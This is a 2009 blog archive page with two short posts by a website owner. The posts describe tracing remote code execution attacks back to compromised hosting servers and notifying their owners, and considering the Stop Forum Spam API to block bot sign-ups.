September 10, 2009

There were 2 posts published on September 10, 2009 (this is page 1 of 1).

Turning the tables on hackers

Every dark cloud has a silver lining, and the recent hacker attacks on MT.Net are no exception. Once I had safely reassembled the website and taken measures against active attacks, I realized what risk hackers run when they attempt remote code execution attacks like the one they ran on my site: they expose the location of their hacker code!

After repelling a couple of attacks per day, I got wise and began to contact the owners of the websites used to attack my site, politely letting them know their servers had been compromised. After doing this for five or so websites, the hacker attacks against my site all but dried up! Perhaps I hit a nerve?

It’s still usually not worth the trouble to track hackers back to their original IP addresses (or at least, not worth the trouble for anyone lacking search warrant power), but taking away a few of a hacker’s precious hideouts sends a message that messing with me comes at a cost.

Blogging and hackers

I found the Stop Forum Spam site this morning when watching l0ser bots try to register accounts on MT.Net. A Google search on an email address used by an obvious bot brought me to the site. There’s an API for automated rejection of these fake user accounts which I’m thinking of using to head off many of the hacker attacks I’ve seen. I’m thinking blocking attacks at the Apache level would be ideal.

On another note, it looks like my WordPress hack post has become very popular with both hackers and webmasters alike. Hackers frequently use its url for attempt cross-site scripting attacks against my machine, while webmasters point to it as one of the first public announcements of a critical WordPress vulnerability. Kudos again to MT.Net reader Scootdawg for being the first to see my blog wasn’t working!

On yet another note, I’m thinking of writing a screenplay where a lowly blogger disses the reclusive dictator of a backwards Asian country and becomes an unwilling “guest” of the dictator for a bizarre weekend.